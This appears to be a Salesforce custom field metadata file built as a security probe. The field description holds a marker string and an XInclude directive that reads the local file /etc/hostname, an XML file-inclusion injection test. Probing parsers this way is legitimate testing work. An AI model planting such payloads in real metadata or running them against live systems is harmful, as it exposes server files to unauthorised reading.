force-app/main/default/objects/Probe__c/fields/XInc__c.field-meta.xml
<CustomField>
    <fullName>XInc__c</fullName>
    <label>XInc</label>
    <type>Text</type>
    <length>255</length>
    <description>GSMARKERXI<xi:include href="file:///etc/hostname" parse="text"/></description>
</CustomField>